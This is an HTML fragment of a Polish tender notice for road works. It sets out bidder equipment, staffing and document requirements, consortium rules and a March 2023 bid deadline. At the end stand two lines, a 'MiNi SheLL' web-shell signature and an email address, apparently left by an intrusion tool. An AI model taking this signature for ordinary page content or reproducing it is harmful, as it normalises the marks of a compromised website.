budowy,<br/>przebudowy oraz rozbudowy dróg na kwotę nie mniejszą niż<br/>100.000,00 zł brutto<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany<br/>za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie<br/>dysponować:<br/>a) co najmniej 1 szt. równiarki samojezdnej,<br/>b) co najmniej 1 szt. walca wibracyjnego, stalowego do<br/>zagęszczania o wadze min. 10 ton,<br/>c) co najmniej 1 szt. koparko-ładowarki,<br/>d) co najmniej 1 szt. koparki jednonaczyniowej, kołowej,<br/>e) co najmniej 1 szt. samochodu samowyładowczego,<br/>f) co najmniej 1 szt. agregowanego recyklera ze<br/>stabilizatorem gruntu,<br/>g) co najmniej 1 szt. walca ogumionego,<br/>h) co najmniej 1 szt. piaskarki samochodowej,<br/>i) co najmniej 1 szt. pługo – odśnieżarki samochodowej.<br/>c) Warunek ten, w zakresie osób skierowanych przez wykonawcę do<br/>realizacji zamówienia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje lub będzie dysponować: - co najmniej 1 osobą kierownikiem budowy - z<br/>uprawnieniami budowlanymi do kierowania robotami<br/>budowlanymi w specjalności budowlanej drogowej bez<br/>ograniczeń, z aktualnymi uprawnieniami zawodowymi<br/>wydanymi na podstawie ustawy Prawo Budowlane i<br/>Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11<br/>września 2014 r. w sprawie samodzielnych funkcji<br/>technicznych w budownictwie (Dz. U. 2014, poz. 1278) lub<br/>inne odpowiednie wydane na podstawie wcześniej<br/>obowiązujących przepisów lub odpowiadające im<br/>uprawnienia budowlane, które zostały wydane obywatelom<br/>państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz<br/>innych przepisów ustawy z dnia 7 lipca 1994r. Prawo<br/>Budowlane (t. jedn. Dz. U. z 2021, poz. 2351 z późn. zm.)<br/>oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220<br/>z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie spełniania warunków udziału w postępowaniu:<br/>a) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą<br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w<br/>okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo<br/>wniosków o dopuszczenie do udziału w postępowaniu,<br/>b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie (wzór wykazu wykonanych robót<br/>budowlanych stanowi załącznik nr 9 do SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych,<br/>wykonanych wspólnie z innymi wykonawcami informacje, o których mowa wyżej<br/>dotyczą robót budowlanych faktycznie przez niego wykonanych, a w przypadku<br/>świadczeń powtarzających się lub ciągłych - również faktycznie przez niego<br/>wykonywanych.<br/>c) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej<br/>w zakresie doświadczenia zostały wykonane lub są wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>d) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie robót budowlanych, wraz<br/>z informacjami na temat ich doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania (wzór wykazu osób skierowanych przez<br/>wykonawcę do realizacji zamówienia stanowi załącznik nr 8 do SWZ).<br/>e) Wykaz urządzeń technicznych (wzór wykazu urządzeń stanowi załącznik nr 10 do<br/>SWZ)<br/>f) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2<br/>PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego,<br/>g) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r., poz. 275 z późn.<br/>zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór<br/>oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub<br/>braku przynależności do tej grupy kapitałowej stanowi załącznik nr 3 do SWZ), h) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie niepodlegania wykluczeniu:<br/>a)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania<br/>określonych w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP odnośnie do<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP odnośnie do zawarcia z innymi<br/>wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 109<br/>ust.1 pkt. 4 i 7 (wzór oświadczenia Wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw<br/>wykluczenia z postępowania stanowi załącznik nr 3a do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba<br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.<br/>Gdy umocowanie osoby składającej ofertę nie wynika<br/>z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument<br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty<br/>lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika.<br/>Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do<br/>reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w<br/>szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>W przypadku gdy zostały sporządzone jako dokument w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie<br/>tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczające zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez<br/>cyfrowe odwzorowanie, rozumieć dokument elektroniczny będący kopią<br/>elektroniczną treści zapisanej w postaci papierowej, umożliwiający<br/>zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego<br/>dostępu do oryginału.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej dokonuje odpowiednio wykonawca, wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub<br/>podwykonawca, w zakresie dokumentów potwierdzających umocowanie do<br/>reprezentowania, które każdego z nich dotyczą lub notariusz. 3) Oświadczenie o którym mowa w art.125 ust.1 ustawy Pzp potwierdzające brak<br/>podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia składane na formularzu stanowiącym zał. nr 2 do SWZ powinno<br/>zostać złożone wraz z ofertą pod rygorem nieważności, w formie<br/>elektronicznej. 4) dokumenty, o których mowa w pkt 8.1. oraz 8.2 lit. d-f zobowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia 5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy; 6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określono w projekcie umowy w załączniku nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com